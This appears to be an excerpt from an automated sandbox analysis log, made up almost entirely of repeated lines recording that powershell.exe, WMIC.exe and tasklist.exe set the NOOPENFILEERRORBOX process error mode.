                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
